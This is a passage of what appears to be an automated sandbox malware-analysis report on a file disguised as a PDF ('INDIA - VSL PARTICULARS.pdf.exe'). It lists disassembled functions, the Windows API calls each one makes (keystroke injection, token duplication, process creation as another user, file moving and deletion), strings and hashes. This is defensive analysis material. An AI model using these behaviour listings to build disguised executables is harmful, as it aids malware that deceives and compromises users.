                              • Source File: 00000000.00000002.2191192531.0000000003F1D000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F1D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_3f1d000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: AttributesFile
                              • String ID:
                              • API String ID: 3188754299-0
                              • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                              • Instruction ID: 184a30efc64d8e1917cd0c12343c687c5d6f68acfb25acbbd22485ebe1f0e8d5
                              • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                              • Instruction Fuzzy Hash: 05D0A73191520CEBCB10CFB4ED049ED73BCDB05324F004765FD15C3280D53699109750
                              Function 004149C2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: __wfsopen
                              • String ID:
                              • API String ID: 197181222-0
                              • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                              • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                              • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                              • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                              Function 0040DA20 Relevance: 1.3, APIs: 1, Instructions: 22COMMON
                              Download Yara Rule
                              APIs
                              • CloseHandle.KERNELBASE(?,?,00426FBF), ref: 0040DA3D
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: CloseHandle
                              • String ID:
                              • API String ID: 2962429428-0
                              • Opcode ID: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                              • Instruction ID: 552ddd844a8bbede063c80161f66c4637379340f91e2bb70a518b226642b2913
                              • Opcode Fuzzy Hash: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                              • Instruction Fuzzy Hash: B9E045B4A04B008BC6308F5BE444416FBF8EEE46203108E1FD4A6C2A64C3B4A1498F50
                              Function 03F1F764 Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                              Download Yara Rule
                              APIs
                              • Sleep.KERNELBASE(000001F4), ref: 03F1F779
                              Memory Dump Source
                              • Source File: 00000000.00000002.2191192531.0000000003F1D000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F1D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_3f1d000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Sleep
                              • String ID:
                              • API String ID: 3472027048-0
                              • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                              • Instruction ID: 902a4af189e762bb1850e40a69ee98201afdc0f10ec5713e5cd71323018a28d6
                              • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                              • Instruction Fuzzy Hash: 52E0BF7594020EEFDB00DFA8D5496DD7BB4FF04311F1046A1FD05D7680DB309E648A62
                              Function 03F1F768 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                              Download Yara Rule
                              APIs
                              • Sleep.KERNELBASE(000001F4), ref: 03F1F779
                              Memory Dump Source
                              • Source File: 00000000.00000002.2191192531.0000000003F1D000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F1D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_3f1d000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Sleep
                              • String ID:
                              • API String ID: 3472027048-0
                              • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                              • Instruction ID: 1ea5158084c284f35f14d6b7a6d2ca46abf4f1350be1fecc6c18f04a605b3c66
                              • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                              • Instruction Fuzzy Hash: 43E0E67594020EDFDB00DFB8D54969D7BB4FF04301F1042A1FD05D2280D6309D608A62

                              Non-executed Functions

                              Function 0047C81C Relevance: 74.2, APIs: 40, Strings: 2, Instructions: 674windowkeyboardCOMMON
                              Download Yara Rule
                              APIs
                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                              • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                              • GetKeyState.USER32(00000011), ref: 0047C92D
                              • GetKeyState.USER32(00000009), ref: 0047C936
                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                              • GetKeyState.USER32(00000010), ref: 0047C953
                              • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                              • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                              • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                              • _wcsncpy.LIBCMT ref: 0047CA29
                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                              • SendMessageW.USER32 ref: 0047CA7F
                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                              • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                              • ImageList_SetDragCursorImage.COMCTL32(00AC3130,00000000,00000000,00000000), ref: 0047CB9B
                              • ImageList_BeginDrag.COMCTL32(00AC3130,00000000,000000F8,000000F0), ref: 0047CBAC
                              • SetCapture.USER32(?), ref: 0047CBB6
                              • ClientToScreen.USER32(?,?), ref: 0047CC17
                              • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                              • ReleaseCapture.USER32 ref: 0047CC3A
                              • GetCursorPos.USER32(?), ref: 0047CC72
                              • ScreenToClient.USER32(?,?), ref: 0047CC80
                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                              • SendMessageW.USER32 ref: 0047CD12
                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                              • SendMessageW.USER32 ref: 0047CD80
                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                              • GetCursorPos.USER32(?), ref: 0047CDC8
                              • ScreenToClient.USER32(?,?), ref: 0047CDD6
                              • GetParent.USER32(00000000), ref: 0047CDF7
                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                              • SendMessageW.USER32 ref: 0047CE93
                              • ClientToScreen.USER32(?,?), ref: 0047CEEE
                              • TrackPopupMenuEx.USER32(?,00000000,?,?,00A01B18,00000000,?,?,?,?), ref: 0047CF1C
                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                              • SendMessageW.USER32 ref: 0047CF6B
                              • ClientToScreen.USER32(?,?), ref: 0047CFB5
                              • TrackPopupMenuEx.USER32(?,00000080,?,?,00A01B18,00000000,?,?,?,?), ref: 0047CFE6
                              • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                              • String ID: @GUI_DRAGID$F
                              • API String ID: 3100379633-4164748364
                              • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                              • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                              • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                              • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                              Function 00434418 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 133keyboardthreadwindowCOMMON
                              Download Yara Rule
                              APIs
                              • GetForegroundWindow.USER32 ref: 00434420
                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                              • IsIconic.USER32(?), ref: 0043444F
                              • ShowWindow.USER32(?,00000009), ref: 0043445C
                              • SetForegroundWindow.USER32(?), ref: 0043446A
                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                              • GetCurrentThreadId.KERNEL32 ref: 00434485
                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                              • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                              • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                              • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                              • SetForegroundWindow.USER32(00000000), ref: 004344B7
                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                              • keybd_event.USER32(00000012,00000000), ref: 004344CF
                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                              • keybd_event.USER32(00000012,00000000), ref: 004344E6
                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                              • keybd_event.USER32(00000012,00000000), ref: 004344FD
                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                              • keybd_event.USER32(00000012,00000000), ref: 00434514
                              • SetForegroundWindow.USER32(00000000), ref: 0043451E
                              • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                              • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                              • String ID: Shell_TrayWnd
                              • API String ID: 2889586943-2988720461
                              • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                              • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                              • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                              • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                              Function 00446313 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 234processCOMMON
                              Download Yara Rule
                              APIs
                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                              • CloseHandle.KERNEL32(?), ref: 004463A0
                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                              • GetProcessWindowStation.USER32 ref: 004463D1
                              • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                              • _wcslen.LIBCMT ref: 00446498
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • _wcsncpy.LIBCMT ref: 004464C0
                              • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                              • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                              • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                              • UnloadUserProfile.USERENV(?,?), ref: 00446555
                              • CloseWindowStation.USER32(00000000), ref: 0044656C
                              • CloseDesktop.USER32(?), ref: 0044657A
                              • SetProcessWindowStation.USER32(?), ref: 00446588
                              • CloseHandle.KERNEL32(?), ref: 00446592
                              • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                              • String ID: $@OH$default$winsta0
                              • API String ID: 3324942560-3791954436
                              • Opcode ID: 17ea6258488d9c46c7a00dd8b46b11f65bca9c9d467b249e48c4e72528dedec9
                              • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                              • Opcode Fuzzy Hash: 17ea6258488d9c46c7a00dd8b46b11f65bca9c9d467b249e48c4e72528dedec9
                              • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                              Function 0044BD27 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 178filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe,0040F545,C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe,004A90E8,C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe,?,0040F545), ref: 0041013C
                                • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 0043392E
                                • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 00433950
                                • Part of subcall function 00433908: __wcsicoll.LIBCMT ref: 00433974
                                • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                              • _wcscat.LIBCMT ref: 0044BD94
                              • _wcscat.LIBCMT ref: 0044BDBD
                              • __wsplitpath.LIBCMT ref: 0044BDEA
                              • FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
                              • _wcscpy.LIBCMT ref: 0044BE71
                              • _wcscat.LIBCMT ref: 0044BE83
                              • _wcscat.LIBCMT ref: 0044BE95
                              • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC1
                              • DeleteFileW.KERNEL32(?), ref: 0044BED3
                              • MoveFileW.KERNEL32(?,?), ref: 0044BEF3
                              • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0A
                              • DeleteFileW.KERNEL32(?), ref: 0044BF15
                              • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2C
                              • FindClose.KERNEL32(00000000), ref: 0044BF33
                              • MoveFileW.KERNEL32(?,?), ref: 0044BF4F
                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
                              • FindClose.KERNEL32(00000000), ref: 0044BF7C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                              • String ID: \*.*
                              • API String ID: 2188072990-1173974218
                              • Opcode ID: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                              • Instruction ID: 72a2fd59153234373391f972af8bc7e503bf673df65afccb4f4ecee040a4f935
                              • Opcode Fuzzy Hash: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                              • Instruction Fuzzy Hash: E25167B2408384AAD734DB50DC45EDF73E9AFC8304F544E1EF68982141EB75D249CBA6
                              Function 004788BD Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 217timefileCOMMON
                              Download Yara Rule
                              APIs
                              • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                              • FindClose.KERNEL32(00000000), ref: 00478924
                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                              • __swprintf.LIBCMT ref: 004789D3
                              • __swprintf.LIBCMT ref: 00478A1D
                              • __swprintf.LIBCMT ref: 00478A4B
                              • __swprintf.LIBCMT ref: 00478A79
                                • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                              • __swprintf.LIBCMT ref: 00478AA7
                              • __swprintf.LIBCMT ref: 00478AD5
                              • __swprintf.LIBCMT ref: 00478B03
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                              • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                              • API String ID: 999945258-2428617273
                              • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                              • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                              • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                              • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                              Function 004033C0 Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 359COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                              • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                              • __wsplitpath.LIBCMT ref: 00403492
                                • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                              • _wcscpy.LIBCMT ref: 004034A7
                              • _wcscat.LIBCMT ref: 004034BC
                              • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                              • _wcscpy.LIBCMT ref: 004035A0
                              • _wcslen.LIBCMT ref: 00403623
                              • _wcslen.LIBCMT ref: 0040367D
                              Strings
                              • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                              • _, xrefs: 0040371C
                              • Error opening the file, xrefs: 00428231
                              • Unterminated string, xrefs: 00428348
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                              • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                              • API String ID: 3393021363-188983378
                              • Opcode ID: d7567003ac82893a05918a50732f98c0da489d2a1a1b1371126f827adaf0f001
                              • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                              • Opcode Fuzzy Hash: d7567003ac82893a05918a50732f98c0da489d2a1a1b1371126f827adaf0f001
                              • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                              Function 00431A86 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 139fileCOMMON
                              Download Yara Rule
                              APIs
                              • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                              • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                              • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                              • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                              • FindClose.KERNEL32(00000000), ref: 00431B20
                              • FindClose.KERNEL32(00000000), ref: 00431B34
                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                              • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                              • FindClose.KERNEL32(00000000), ref: 00431BCD
                              • FindClose.KERNEL32(00000000), ref: 00431BDB
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                              • String ID: *.*
                              • API String ID: 1409584000-438819550
                              • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                              • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                              • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                              • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                              Function 00431BE8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 116COMMON
                              Download Yara Rule
                              APIs
                              • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                              • __swprintf.LIBCMT ref: 00431C2E
                              • _wcslen.LIBCMT ref: 00431C3A
